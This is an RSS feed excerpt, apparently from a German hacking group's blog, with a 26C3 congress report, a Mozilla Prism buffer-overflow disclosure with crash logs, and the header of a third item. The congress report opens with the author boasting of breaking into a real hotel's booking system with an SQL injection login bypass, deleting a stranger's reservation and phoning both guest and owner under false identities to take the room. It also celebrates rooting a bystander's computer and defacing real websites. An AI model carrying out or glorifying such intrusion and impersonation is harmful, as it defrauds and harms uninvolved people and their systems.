		<title>26c3 Chaos Computer Club &#8211; Here Be Dragons 2009</title>
		<link>http://www.global-evolution.info/news/?p=1015</link>
		<comments>http://www.global-evolution.info/news/?p=1015#comments</comments>
		<pubDate>Mon, 04 Jan 2010 13:48:07 +0000</pubDate>
		<dc:creator>GE TEAM</dc:creator>
				<category><![CDATA[All]]></category>

		<guid isPermaLink="false">http://www.global-evolution.info/news/?p=1015</guid>
		<description><![CDATA[Eines vorab &#8230; der Event war super. Alles hat angefangen mit einer total verhackten Woche über die ich hinweg vergessen habe das die 26c3 am Ende ansteht. Als ich Nachmittags fast schon gegen Abend, die Nachricht bekomme von &#8220;Beni CCC Gießen&#8221; das es morgen zum CCC nach Berlin geht wurde mir klar &#8220;OHOH Hotel buchen [...]]]></description>
			<content:encoded><![CDATA[<p>Eines vorab &#8230; der Event war super. Alles hat angefangen mit einer total verhackten Woche über die ich hinweg vergessen habe das die 26c3 am Ende ansteht. Als ich Nachmittags fast schon gegen Abend, die Nachricht bekomme von &#8220;Beni CCC Gießen&#8221; das es morgen zum CCC nach Berlin geht wurde mir klar &#8220;OHOH Hotel buchen vergessen!&#8221;. Ich schnell aufgestanden und uns ein gutes Hotel gesucht. Also mir dann überall wo es billig war die Reservierungen anderer in die quere kamen, musste ich schnell die ultimative 26c3 Aktion abziehen um unsere Fahrt zu sichern.</p>
<p><span id="more-1015"></span><strong>1. (SQL/RFI) Freundliche Übernahme, des Buchungssystems von Hotel **********</strong></p>
<p>Auf der Internetseite des Hotel gab es ein Kundenbuchungsystem. In diesem Buchungssystem konnte man von außen nur sehen welche Zimmer wann reserviert waren. Glücklicherweise war im Source ein Link zu dem Application Login. Nach dem ich dort angekommen war habe ich es mit einfachen Tricks wie &#8216;or 1=1&#8211; versucht einen Auth Bypass zu machen. Siehe da &#8220;Wilkommen im Buchungssystem &#8212; Herr ****&#8221;.</p>
<p><strong>2. (DatenBank) Löschen &#8211; Einträg mit der Buchung für 27.12-30.12 vom 26.12 18.00</strong></p>
<p>In dem System konnte man schön alles bearbeiten &amp; verändern wie man es brauchte als Admin. Also wurden die 2 letzten zwei Einträge aufgenommen.</p>
<p><strong>3. (Social-Engeneering) Anruf bei dem Kunden mit der Buchung &amp; Absage</strong></p>
<p>Nun musste man versuchen über die Kontaktnummer, die Person welche vor 2 stunden gebucht hatte für den 27.-30.12. umleiten &amp; so ein freies Zimmer an dem Tag zu bekommen. Also rief ich dort an im Namen des Hoteinhabers den ich aus der DB hatte &amp; habe so den Kunden freundlich auf ein anderes Hotel umgeleitet. Dieser war sehr freundlich und verständisvoll &amp; hat sich einfach ein anderes Hotel gesucht.</p>
<p><strong>4. (Social-Engeneering) Anruf beim Hotelbesitzer (Kunde) &amp; Umbuchung</strong></p>
<p>Damit nun der ganze scheiss nicht auffliegt habe ich dann einfach im Namen der Person angerufen welche die Buchung gemacht hat &amp; habe die Reservierung  umgeschrieben auf K*******. Der Hotelbesitzer hat mich zur Verifizierung nach der Adresse gefragt &#8230; die ich schnell aus der Datenbank nochmal aufrufen mussten.</p>
<p><strong>5. Lets go to &#8230; 26c3 Berlin</strong></p>
<p>Schon war alles umgebucht &amp; da ich mir sehr sicher war, dass alles bis zum Ende klappt bin ich mit zwei anderen losgefahren.</p>
<p><strong>Tag 1:</strong></p>
<p>Nach diesem kombinierten Hack war das einize Problem noch, ob wir mit dieser Aktion überhaupt durch kommen. Kurz vor dem Einbuchen in   die Ferienwohnung haben wir schon ein wenig kernel-panic gehabt, weil wir nicht wussten ob es auch alles so klappt wie wir es uns ausgemalt hatten. Glücklicherweise hat alles geklappt und wir haben den Hotelbesitzer sogar über die kritischen Sicherheitslücken bestens informiert(patched/fixed). Danach hat er uns von seiner Lochkarten skills (70-80&#8242;er) &amp; Server-Farm erzählt + uns das Passwort zum Router genannt. War echt lustig, dafür dürfen ab jetzt jedes Mal zu den Chaos Events in Berlin kostenlos übernachten.</p>
<p>Nachdem alles mit dem Hotel geklappt hatte mussten wir nur noch zur 26c3 (BBC|Alexanderplatz) hinfahren.<br />
<img src="http://www.global-evolution.info/news/files/26c3/bbc.jpg" alt="" width="630/" /><br />
Dort angekommen haben wir schon gleich die ersten Freunde getroffen wie Ben &#8220;ausm CCC Gießen&#8221;, der wirklich einer der besten Helfer &amp; Informationsverbreiter dort war. Immer wenn wir irgendwas technisch oder organisatorisches hatten konnten wir uns auf diesen Kollegen doppelt so gut verlassen. Ben musste aber spontan frühzeitig los weil er einen Wasserrohrbruch im Haus hatte &amp; der Untermieter schon schwimmen konnte.</p>
<p>Nachdem wir am ersten Tag dort kaum Plätze gefunden haben mussten wir uns am Tisch der Porno leechenden Mannheimer vom CCC niederlassen. Kurze Zeit später wurde es immer lustiger &amp; komischerweise saßen plötzlich alle richtigen Nerds hinten an einem Tisch zusammen, nachdem die ersten schlafen waren. Besonders zu erwähnen ist der Hacker &#8220;Fauli aka BABBAGE&#8221; aus Österreich &#8230;</p>
<p><img src="http://global-evolution.info/news/files/26c3/1.jpg" alt="" width="630" height="335" /></p>
<p>Kurz später kamen dann Hoohead, Padawan, SkskilL &amp; Snag(krank) dazu &#8230;<br />
<img src="http://global-evolution.info/news/files/26c3/k23.jpg" alt="" width="630" height="335" /></p>
<p>Glücklicherweise haben wir noch 2 richtig coole Nerds aus München getroffen die &#8220;Ben &amp; Ash&#8221; heißen und mit uns dann zusammen so viel Party Spaß hatten. Diese 3 Personen waren echt richtig gute und ehrliche Leute mit denen man feiern und basteln konnte. Was ich auch super lustig fand im Hackcenter, dass ein blonder nicht CCCler gegenüber als versucht hat nazi-sites(flirt) zu bashen und laut geprahlt hat während wir ihn gerootet haben &#8230; als ausgleichende Gerechtigkeit für alle Flamer(<em>Heise.de/Golem.de/Ubuntu-Users</em>) die sich über die bösen Cracker dort beschweren. Elektronische Gerechtigkeit kann man nicht aufhalten &amp; trifft immer den/die Richtigen. *Duck</p>
<p>Von  16.00-17.00 Uhr kamen dann die Leute mit den kleinen mobilen Drohnen auf dem Platz vor dem CCC zum Vorschein. Die Kunststücke waren alle sehr gut &amp; vor allem präzise navigiert. Allein die Navigation, der Fluggeräte ist sowas von präzise, dass man mit der Drohne wenige Meter vor Personen schweben kann ohne diesen zu Nahe zu kommen. Sehen kann man das auf einigen Videos besonders gut &#8230;</p>
<p><strong>Demonstration -  Priv Video </strong>(Sound Off/Music On)<br />
<strong>Link:</strong> <a href="http://global-evolution.info/news/files/26c3/26c3-Drone.wmv">Download</a></p>
<p><strong>Oktocopter</strong><br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="630" height="335" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/0Ztr6FmjIHA&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="630" height="335" src="http://www.youtube.com/v/0Ztr6FmjIHA&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p><strong>Skynet</strong><br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="630" height="335" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/JxyQ5AV7oV0&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="630" height="335" src="http://www.youtube.com/v/JxyQ5AV7oV0&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p><strong>MicroCopter &#8211; Indoor Fly</strong><br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="630" height="335" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/oQ21JMKXVu4&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="630" height="335" src="http://www.youtube.com/v/oQ21JMKXVu4&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object><br />
<strong></strong></p>
<p><strong>Chaos Familien Duell &#8211; Quiz</strong><br />
<img src="http://global-evolution.info/news/files/26c3/cj1.jpg" alt="" width="630" height="335" /><br />
<img src="http://global-evolution.info/news/files/26c3/cj2.jpg" alt="" width="630" height="335" /><br />
<img src="http://global-evolution.info/news/files/26c3/cj3.jpg" alt="" width="630" height="335" /></p>
<p>Wer Abends zu dem Hacker-Quiz kam, wurde mit lachenden Tränen belohnt.</p>
<p><strong>C-Base Berlin</strong></p>
<p>Am Abend waren wir dann in der C-Base wo man grundsätzlich nur friedlichen &amp; guten Spaß haben kann. Die Party war sehr geil und es kam bester &#8220;Electro&#8221;. Ash hat nach einem kurzen Break-Dance Battle vor der Tür (HIPHOP) dann doch den Weg rein gefunden. Mein absolutes oldschool High-light mit backflash in die Kindheit war der GoldenAxe Spielautomat der hinten am Eingang(c-base) stand. Wenn es nur irgendwas gibt was an dem Abend &#8220;epic&#8221; war dann dieser Spielautomat.</p>
<p><img src="http://global-evolution.info/news/files/26c3/preview-6.JPG" alt="" width="630" height="335" /></p>
<p><img class="alignnone" src="http://www.global-evolution.info/news/files/26c3/45.jpg" alt="" width="630" height="480" /></p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="630" height="335" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/jycpYlgj1JA&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="630" height="335" src="http://www.youtube.com/v/jycpYlgj1JA&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p><strong>Tag2:</strong></p>
<p>Doc Schneider der vom CCC Gießen kommt war ein wirklich lustiger Zimmerpartner weil wir immer was zu lachen hatten und total verplant den zweiten Tag in Berlin rumgejungelt sind. Komischerweise war er schon um 11 Uhr Mittags fit(Unglaublich!) wo ich gerade noch mit Alice vom Tag davor in meinen träumen getanzt habe. Um 14 Uhr war auch ich dann wieder im Center für Nerds unterwegs und habe mir erstemal einen fetten Platz in der Lounge neben der Theke gesichert. Ja ich weiss da war kein Platz aber wir haben da einfach welchen gemacht &#8230; bei uns gabs kostenlose &amp; frische Früchte(Türke ums Eck), gute Hacks, nette Leute auf Club Mate &amp; ne menge anderer coffeingeschädigter Seelen. Also mir persönlich hat das Zeug nicht so gut geschmeckt, die anderen haben das Zeug aber literweise gekippt haben.</p>
<p><img src="http://global-evolution.info/news/files/26c3/IMG_6.JPG" alt="" width="630" height="335" /><br />
<img src="http://global-evolution.info/news/files/26c3/c33.jpg" alt="" width="630" height="335" /></p>
<p>Über die Tage hinweg haben wir eine Menge Vorträge und Shows gesehen die uns alle mehr als nur beeindruckt haben. Einen Fahrplan hatten wir ja schon über das Wiki bekommen wo für uns alle wichtigen Vorträge &amp; Workshops verzeichnet waren.</p>
<p><strong>Dragon FahrPlan</strong>: http://events.ccc.de/congress/2009/Fahrplan/track/Hacking/index.en.html</p>
<p><strong>Die besten Vorträge &#8230;</strong></p>
<p><a href="http://events.ccc.de/congress/2009/Fahrplan/track/Hacking/3670.en.html">Blackbox JTAG Reverse Engineering</a><br />
<a href="http://events.ccc.de/congress/2009/Fahrplan/track/Hacking/3658.en.html">Black Ops Of PKI</a><br />
<a href="http://events.ccc.de/congress/2009/Fahrplan/track/Hacking/3507.en.html">Fuzzing the Phone in your Phone</a><br />
DECT (I-III)<br />
<a href="http://events.ccc.de/congress/2009/Fahrplan/track/Hacking/3608.en.html">Playing with the GSM RF Interface</a><br />
<a href="http://events.ccc.de/congress/2009/Fahrplan/track/Hacking/3353.en.html">Reverse-Engineering DisplayLink devices</a><br />
<a href="http://events.ccc.de/congress/2009/Fahrplan/events/3452.en.html">Here Be Electric Dragons</a><br />
<a href="http://events.ccc.de/congress/2009/Fahrplan/events/3654.en.html">GSM: SRSLY?</a><br />
<a href="http://events.ccc.de/congress/2009/Fahrplan/events/3540.en.html">A Hacker’s Utopia</a><br />
<a href="http://events.ccc.de/congress/2009/Fahrplan/events/3592.en.html">Cybernetic Cannibalism</a><br />
<a href="http://events.ccc.de/congress/2009/Fahrplan/events/3494.en.html">Defending the Poor</a></p>
<p><img src="http://global-evolution.info/news/files/26c3/x1.jpg" alt="" width="630" height="335" /><br />
<img src="http://global-evolution.info/news/files/26c3/x2.jpg" alt="" width="630" height="335" /><br />
<img src="http://global-evolution.info/news/files/26c3/x3.jpg" alt="" width="630" height="335" /><br />
<img src="http://global-evolution.info/news/files/26c3/x4.jpg" alt="" width="630" height="335" /><br />
<img src="http://global-evolution.info/news/files/26c3/x5.jpg" alt="" width="630" height="335" /></p>
<p><strong><img src="http://www.global-evolution.info/news/files/26c3/46.jpg" alt="" width="630" height="480" /></strong></p>
<p><strong><img src="http://www.global-evolution.info/news/files/26c3/47.jpg" alt="" width="630" height="480" /></strong></p>
<p><strong><img src="http://www.global-evolution.info/news/files/26c3/48.jpg" alt="" width="630" height="480" /><br />
</strong></p>
<p><strong>LaserShow im BBC<br />
</strong></p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="630" height="335" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/voKUVqM1ykc&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="630" height="335" src="http://www.youtube.com/v/voKUVqM1ykc&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p><strong>26C3 Tesla Coil &#8211; Ghostbusters</strong></p>
<p>Das folgende Video hat uns allen sehr gut gefallen. Wir werden eure Projekte weiter gespannt verfolgen.<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="630" height="335" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/vKkPqVtrrv4&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="630" height="335" src="http://www.youtube.com/v/vKkPqVtrrv4&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Wir haben aber auch selber noch ein Bild aus unserem Archiv &#8230;<br />
<img src="http://global-evolution.info/news/files/26c3/c44.jpg" alt="" width="630" height="335" /></p>
<p><strong>Lego Sumo &#8211; All Bots @ One Table</strong><br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="630" height="335" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/XNJbgnGY-58&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="630" height="335" src="http://www.youtube.com/v/XNJbgnGY-58&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p><strong>Electronic Equipment</strong></p>
<p><img src="http://global-evolution.info/news/files/26c3/elec.jpg" alt="" width="630" height="335" /><br />
<img src="http://global-evolution.info/news/files/26c3/elec2.jpg" alt="" width="630" height="335" /><br />
<img src="http://global-evolution.info/news/files/26c3/elec3.jpg" alt="" width="630" height="335" /><br />
<img src="http://global-evolution.info/news/files/26c3/elec4.jpg" alt="" width="630" height="335" /></p>
<p><strong>Dunkin Donut &#8211; Denial of Service Vulnerability</strong><br />
Wisst ihr bis vor wenigen Tagen haben wir alle noch gedacht, dass eine Denial of Service Attacke immer große Schäden verursacht. Schönerweise konnte man sich hier vom lustigen aber friedlichen Leuten dazu einladen lassen Abends den Dunkin Donut Laden am Alexanderplatz zu stürmen. Alles hat damit angefangen das eine einzelne Person im Hack-Center &#8220;Dunkin Donuts&#8221; gebrüllt hat, wenige Sekunden später sind wir und alle um uns rum aufgestanden und haben eine nette &#8220;koordinierte&#8221; DoS Attacke gezogen welchen jedem dort einen mega Spaß gebracht hat, vom Mitarbeiter bis zum Endverbraucher.</p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="630" height="335" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/5I11Hn1ggbs&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="630" height="335" src="http://www.youtube.com/v/5I11Hn1ggbs&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Nach der Human DoS Attacke wo alle natürlich gestärkt zurück kamen ging der Abend erst so richtig los. Nachts haben sich die besten Sec-Nerds ausgetobt, was man an den Uploads übers Netzwerk sehen konnte. Das folgende Video wurde am 29. im Event Wiki verlinkt &amp; ist seit 2 Tagen auf Youtube/AOL verlinkt. Wo es her kommt weiss bisher keiner aber ich persönlich fand es ganz ergänzent zu den News auf Heise/Golem.</p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="630" height="335" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/J02OypGer34&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="630" height="335" src="http://www.youtube.com/v/J02OypGer34&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Einige Hack Drops gingen von anderen über das Wiki Page raus was man alle 30mins sehen konnte, darunter der Server der Bild-Zeitung, BVG &amp; verschiedenste radikale Webseiten wie lokale NPD Räucherbuden.</p>
<p><a href="http://events.ccc.de/congress/2009/wiki/Hacked/Targets">http://events.ccc.de/congress/2009/wiki/Hacked/Targets</a></p>
<p>Ich persönlich bin ja auch gegen schädigende Angriffe &amp; Hacks aber irgendwie tun die Typen ja auch was für die Allgemeinheit. Einen Hack aus dem Archiv fand ich besonders lustig und zwar ging der in Richtung &#8220;SVP Stadt Zuerich&#8221; wo sogar heute noch im obersten TOPIC &#8220;26c3- Here be Dragons&#8221; steht. http://www.svp-stadt-zuerich.ch/</p>
<p><img src="http://global-evolution.info/news/files/26c3/svp.jpg" alt="" width="630" height="335" /></p>
<p>Am besten man guckt sich das einfach an und denkt sich seinen Teil dazu. Lustig fand ich, dass die Leute, der SVP nicht mal in der Lage waren aus der Webseite den Titel zu entfernen. Was man an dem folgenden Suchmaschineneintrag sehen kann &#8230;<br />
<img src="http://global-evolution.info/news/files/26c3/svp-google.png" alt="" width="630" height="200" /></p>
<p>Später in der Nacht ging es im Netzwerk erst so richtig los mit DNS Attacken, Spoofing, Sniffing, Privileg Escalations &amp; Co. Was da manchmal an Checksum zurück kam war ja fast schon peinlich. Besonders sollten sich einige &#8220;Netzwerk Cracker&#8221; das Wort MSF-Framework einprägen. Wenn man anderen was unterschieben möchte sollte man wenigstens den Dateiname richtig schreiben. Nachdem wir das W-Lan dann einmal kurz sanft unterbrochen haben gings dann aber viel besser.</p>
<p><strong>Tag 3</strong></p>
<p>Am Morgen habe ich mir nochmal genauer angeschaut wie Zensursula WarGame funktioniert da ich denke es wäre eine echte Bereicherung für das Hacking-Lab. Bei Zensursula geht es darum eine kleine konfigurierte Blackbox über 3 Ebenen hinweg zu penetrieren um den Content trotzdem durch den Filter zu bekommen. Ich wollte es versuchen diese Challenge komplett zu meistern leider war es für mich nur noch 1&#8242;ne Stunde bis zur Rückfahrt/Abfahrt. Wer genaueres erfahren möchte kann sich den folgenden link anschauen. http://events.ccc.de/congress/2009/wiki/Zensursulas_Blackbox<br />
<img src="http://global-evolution.info/news/files/26c3/zensursula.png" alt="" width="630" height="335" /></p>
<p><strong>CCC &#8211; Book of Records ?</strong></p>
<p>Am Rande des Chaos Congress wurden 11k(11.000) Club Mate Getränke verzehrt. Club Mate ist eine nicht alkoholische Brause in Form eines sehr leckeren coffeinhaltigen Getränks. Ein weiterer Rekord wurde im Bereich Downloading aufgestellt. Insgesamt waren es 123 Terabyte verschifft worden wie das NOC berichtete. Ein weiterer Rekord wurde bei den Besucherzahlen aufgestellt die bei ca. 9000 lagen.<br />
<img src="http://global-evolution.info/news/files/26c3/rocket.jpg" alt="" width="630" height="335" /></p>
<p><strong>Wanted: 1 Kasten Club Mate?</strong><br />
<img src="http://www.global-evolution.info/news/files/26c3/kasten-club-mate.jpg" alt="" width="630" height="335" /><br />
Wer die Identität der Person(oben links) kennt, soll sich bei  Hoohead melden &amp; bekommt einen Kasten Club Mate.</p>
<p><strong>Party</strong> (Doc_Snyder)<br />
<img src="http://global-evolution.info/news/files/26c3/666.jpg" alt="" width="630" height="335" /></p>
<p><strong>Download till Death &#8230;<a href="http://ftp.ccc.de/congress/26c3/"><br />
</a></strong></p>
<p>Der öffentliche FTP ist per HTTP anonym erreichbar. Viel Spaß beim runterladen der Video wir haben schon alles &#8230; <a href="http://ftp.ccc.de/congress/26c3/"><strong>ftp.ccc.de/congress/26c3</strong></a></p>
<p><strong>Was hat gefehlt ?!</strong></p>
<p>Nachdem wir 100 Leute gefragt haben was den so  wirklich gefehlt hat auf der 26c3, haben &#8230;</p>
<p><strong>45</strong> Personen haben mit  &#8220;die Sitzplätze&#8221; geantwortet</p>
<p><strong>27</strong> waren für mehr &#8220;Tagestickets&#8221;</p>
<p><strong>23</strong> haben beantwortet mit &#8220;Capture the Flag (CTF)&#8221;</p>
<p><strong>5</strong> haben auf noch eine Dunkin Donut DoS Attacke bestanden</p>
<p><strong>Was hätte fehlen können?!</strong><br />
Die Porno leechenden Mannheimer die sich so fett gemacht haben ^^. Der &#8220;mutige&#8221; Grayhat, der Fotos von uns im Hack-Center machen wollte. Der möchtegern Flirt Homepage Hacker &amp; der unübertroffene Wasserrohrbruch in Ben&#8217;s Haus.</p>
<p><strong>Greetz:</strong> Ben(CCC-Gießen), Fauli(AT), Ash &amp; Ben (Muenchen), X4lt, Doc_Snyder, Hoo, Padawan, ric0, skskilL, snag(ck), Hotelbesitzer.</p>
<p>[Writer: annon1]</p>
]]></content:encoded>
			<wfw:commentRss>http://www.global-evolution.info/news/?feed=rss2&amp;p=1015</wfw:commentRss>
		<slash:comments>5</slash:comments>
<enclosure url="http://global-evolution.info/news/files/26c3/26c3-Drone.wmv" length="9006561" type="video/x-ms-wmv" />
		</item>
		<item>
		<title>Mozilla Prism v1.0b2 &#8211; Stack Buffer Overflow Vulnerability</title>
		<link>http://www.global-evolution.info/news/?p=957</link>
		<comments>http://www.global-evolution.info/news/?p=957#comments</comments>
		<pubDate>Thu, 24 Dec 2009 09:19:20 +0000</pubDate>
		<dc:creator>GE TEAM</dc:creator>
				<category><![CDATA[All]]></category>

		<guid isPermaLink="false">http://www.global-evolution.info/news/?p=957</guid>
		<description><![CDATA[This week I audited the new Mozilla PRISM what is usually called as a secure browser engine &#38; used by a lot of software(Zimbra&#124;Desktop). Prism is an application that lets users split web applications out of their browser and run them directly on their desktop in a secure mode. Mozilla Developers have produced 1 application [...]]]></description>
			<content:encoded><![CDATA[<p>This week I audited the new Mozilla PRISM what is usually called as a secure browser engine &amp; used by a lot of software(Zimbra|Desktop). Prism is an application that lets users split web applications out of their browser and run them directly on their desktop in a secure mode. Mozilla Developers have produced 1 application (standalone)of Prism what is stable running &amp; 1 addon for Mozilla Fireox browser.</p>
<p><span id="more-957"></span>The goal to beat the high challenge is to find a Z0D vulnerability in the Prism software of Mozilla.</p>
<p><strong>Product URL:</strong> https://mozillalabs.com/prism/<br />
<strong>Download URL: </strong> http://prism.mozilla.com/started/</p>
<p>Ever when we start to audit software like that, we first test the restricted string-size of inputs. This attack is one of the most basic methods to overflow with inserted over-sized(large) strings like URL&#8217;s or Words. After we tested the restriction string-size of the URL/Name GE-TEAM discovers a stack buffer-overflow vulnerability for Prism v1.0b2 mozilla application + FireFox addon.</p>
<p><strong>Affected Versions: </strong><br />
Prism &#8211; STANDALONE APPLICATION (v1.0b2)<br />
Prism Firefox Extension &#8211; FIREFOX ADDON (v1.0b2)</p>
<p>Windows Vista BEX(Overflow) Error Message on Prism Addon Firefox &#8230;</p>
<p>Problemereignisame:    BEX<br />
Anwendungsname:        firefox.exe<br />
Anwendungsversion:    1.9.1.3593<br />
Anwendungszeitstempel:    4aef8082<br />
Fehlermodulname:    StackHash_0c1c<br />
Fehlermodulversion:    0.0.0.0<br />
Fehlermodulzeitstempel:    00000000<br />
Ausnahmeoffset:        41414141<br />
Ausnahmecode:        c0000005<br />
Ausnahmedaten:        00000008<br />
Betriebsystemversion:    6.0.6002.2.2.0.768.3<br />
Gebietsschema-ID:    1031<br />
Zusatzinformation 1:    0c1c<br />
Zusatzinformation 2:    02e5e7938cbdf4517280afd626c56a15<br />
Zusatzinformation 3:    4f6a<br />
Zusatzinformation 4:    e8605fe6e21ad013004e473d591fd489</p>
<p><img class="alignnone" src="http://www.global-evolution.info/news/files/prism/addon.png" alt="" width="630" height="335" /></p>
<p>Windows Vista BEX(Overflow) Error Message on Prism Application(STANDALONE)</p>
<p>Problemereignisame:    BEX<br />
Anwendungsname:        prism.exe<br />
Anwendungsversion:    1.9.2.3477<br />
Anwendungszeitstempel:    4a565337<br />
Fehlermodulname:    MOZCRT19.dll<br />
Fehlermodulversion:    8.0.0.0<br />
Fehlermodulzeitstempel:    4a542beb<br />
Ausnahmecode:        c0000005<br />
Ausnahmeoffset:        0001838a<br />
Betriebsystemversion:    6.0.6002.2.2.0.768.3<br />
Gebietsschema-ID:    1031<br />
Zusatzinformation 1:    0ae2<br />
Zusatzinformation 2:    a1f9523330457d36593f6e0b3438b757<br />
Zusatzinformation 3:    677b<br />
Zusatzinformation 4:    e391b47c6bb6b6f2db80d1a37eb89949</p>
<p><img class="alignnone" src="http://www.global-evolution.info/news/files/prism/debugger.png" alt="" width="630" height="335" /></p>
<p>&#8230; now a reproduced errors with AAAAA&#8230;+ by Windows Vista BEX(Overflow) Error Message on Prism Application(STANDALONE)</p>
<p>Problemereignisname:        BEX<br />
Anwendungsname:        prism.exe<br />
Anwendungsversion:        1.9.0.3405<br />
Anwendungszeitstempel:    49f89f9d<br />
Fehlermodulname:        StackHash_1477<br />
Fehlermodulversion:        0.0.0.0<br />
Fehlermodulzeitstempel:    00000000<br />
Ausnahmeoffset:        00414141<br />
Ausnahmecode:            c0000005<br />
Ausnahmedaten:        00000008<br />
Betriebsystemversion:        6.0.6002.2.2.0.768.3<br />
Gebietsschema-ID:        1031<br />
Zusatzinformation 1:        1477<br />
Zusatzinformation 2:        528bb57b980c1da9bf8c456a3876b4b2<br />
Zusatzinformation 3:        22f3<br />
Zusatzinformation 4:        05475e8449807bb817c3945e60bda828</p>
<p><img class="alignnone" src="http://www.global-evolution.info/news/files/prism/standalone.png" alt="" width="630" height="335" /></p>
<p>Due to the lack of the unrestricted URL/Name size it is possible for attackers to get the privileges of the running process. The risk of the vulnerability is estimated as high. The vulnerability is reported to Mozilla Developer-Team &amp; verified + analysed over Compass Security. We produced a video about the verification of the vulnerability &amp; some low views around the test start &#8230;</p>
<p><strong>Startup: </strong> 2009-06-13<br />
<strong>Verified: </strong> 03.12.2009<br />
<strong>Challenge: </strong> Hacking Secure Browser | Mozilla Prism<br />
<strong>Lab URL: </strong> https://www.hacking-lab.com/ranking/event.html?eventid=43</p>
<p>We produced a little video about the vulnerability &amp; some low views around the restricted input tests + errors &#8230; click the picture to view the a part of the test video &#8230;</p>
<p><a href="http://www.global-evolution.info/news/files/prism/test-video.wmv"><img src="http://www.global-evolution.info/news/files/prism/pIC.png" alt="" width="630" height="335" /><br />
</a></p>
<p>The vulnerability is reported &amp; not published via advisory because of fix/patch status. The Full advisory follows in this posting next weeks. We wish all readers, partners &amp; nerds happy x-mas &amp; a good h4ck in the new year 2010.</p>
<p>[Writer: ~remove]</p>
]]></content:encoded>
			<wfw:commentRss>http://www.global-evolution.info/news/?feed=rss2&amp;p=957</wfw:commentRss>
		<slash:comments>1</slash:comments>
<enclosure url="http://www.global-evolution.info/news/files/prism/test-video.wmv" length="24738607" type="video/x-ms-wmv" />
		</item>
		<item>
		<title>PandoraFMS Monitoring v2.x &#8211; SQL Injection Vulnerability</title>
		<link>http://www.global-evolution.info/news/?p=983</link>
		<comments>http://www.global-evolution.info/news/?p=983#comments</comments>
		<pubDate>Mon, 21 Dec 2009 09:07:27 +0000</pubDate>
		<dc:creator>GE TEAM</dc:creator>
				<category><![CDATA[All]]></category>

		<guid isPermaLink="false">http://www.global-evolution.info/news/?p=983</guid>
